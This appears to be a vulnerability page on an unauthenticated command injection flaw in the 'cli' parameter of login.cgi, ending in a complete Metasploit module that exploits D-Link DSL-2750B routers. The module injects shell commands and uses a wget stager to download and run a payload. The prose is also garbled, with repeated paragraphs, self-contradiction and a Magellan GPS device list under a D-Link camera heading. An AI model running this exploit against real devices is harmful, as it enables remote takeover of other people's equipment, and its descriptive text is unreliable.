This issue is due to the fact that the login.cgi script accepts unauthenticated input via the cli parameter passed on the command line. In addition to accepting the cli parameter, the device also permits access to the CGI via http, which allows remote attackers to issue arbitrary commands. These unauthenticated commands can be exploited to cause remote code execution. In certain vulnerable versions of the firmware, access to the remote CGI also allows unauthenticated command injection. These devices are prone to code injection attacks because the login.cgi script does not require authentication for all remote commands. However, these attacks are possible because the login.cgi script does not require authentication for all remote commands.     Existing proof-of-concept scripts for these devices demonstrate how the login.cgi script can be used to access other administrative functions.     In addition to the login.cgi script, these devices also permit remote attackers to access the device via ssh, which may be exploited for unauthenticated command execution. SSH access can be enabled as a part of setting up new devices or as a maintenance function. This issue is due to the fact that the login.cgi script accepts unauthenticated input via the cli parameter passed on the command line. In addition to accepting the cli parameter, the device also permits access to the CGI via http, which allows remote attackers to issue arbitrary commands

Vulnerability overview

This vulnerability affects multiple models of D-Link IP Cameras. This issue is due to the fact that the login.cgi script accepts unauthenticated input via the cli parameter passed on the command line. In addition to accepting the cli parameter, the device also permits access to the CGI via http, which allows remote attackers to issue arbitrary commands. These unauthenticated commands can be exploited to cause remote code execution. In certain vulnerable versions of the firmware, access to the remote CGI also allows unauthenticated command injection. These devices are prone to code injection attacks because the login.cgi script does not require authentication for all remote commands. However, these attacks are possible because the login.cgi script does not require authentication for all remote commands.

Vulnerable Devices

The following devices are vulnerable to CVE-2016-20017:

Magellan RoadMate RM 1055
Magellan RoadMate RM 1255

CVE-2016-20018

This issue is due to the fact that the web.cgi script accepts unauthenticated input via the cli parameter passed on the command line. In addition to accepting the cli parameter, the device also permits access to the CGI via http, which allows remote attackers to issue arbitrary commands. These unauthenticated commands can be exploited to cause remote code execution. In certain vulnerable versions of the firmware, access to the remote CGI also allows unauthenticated command injection. These devices are prone to code injection attacks because the web.cgi script does not require authentication for all remote commands. However, these attacks are possible because the web.cgi script does not require authentication for all remote commands.     Existing proof-of-concept scripts for these devices demonstrate how the web.cgi script can be used to access other administrative functions in addition to performing HTTP GET requests against other parts of the device's configuration or running a custom application on it such as a webserver or database server

Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link DSL-2750B OS Command Injection',
      'Description'    => %q(
        This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
        Vulnerability can be exploited through "cli" parameter that is directly used to invoke
        "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
      ),
      'Author'         =>
        [
          'p@ql', # vulnerability discovery
          'Marcin Bury <marcin[at]threat9.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['PACKETSTORM', 135706],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
          ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
        ],
      'Targets'        =>
        [
          [
            'Linux mipsbe Payload',
            {
              'Arch' => ARCH_MIPSBE,
              'Platform' => 'linux'
            }
          ],
          [
            'Linux mipsel Payload',
            {
              'Arch' => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate'  => 'Feb 5 2016',
      'DefaultTarget'   => 0))

    deregister_options('CMDSTAGER::FLAVOR')
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/ayefeaturesconvert.js'
    )

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code.to_i == 200 && res.body.include?('DSL-2750')
      vprint_status('Remote host is not a DSL-2750')
      return CheckCode::Safe
    end

    if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
      version = Regexp.last_match[1]
      vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
      if version >= "1.01" && version <= "1.03"
        return Exploit::CheckCode::Appears
      end
    end

    CheckCode::Safe
  rescue ::Rex::ConnectionError
    vprint_error('Connection failed')
    return CheckCode::Unknown
  end

  def execute_command(cmd, _opts)
    payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
    send_request_cgi(
      {
        'method' => 'GET',
        'uri' => '/login.cgi',
        'vars_get' => {
          'cli' => "#{payload}$"
        },
        'encode_params' => false
      },
      5
    )
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
  end

  def exploit
    print_status("#{peer} Checking target version...")

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    execute_cmdstager(
      flavor: :wget,
      linemax: 200
    )
  end
end

Timeline

Published on: 10/19/2022 05:15:00 UTC
Last modified on: 10/21/2022 20:19:00 UTC

References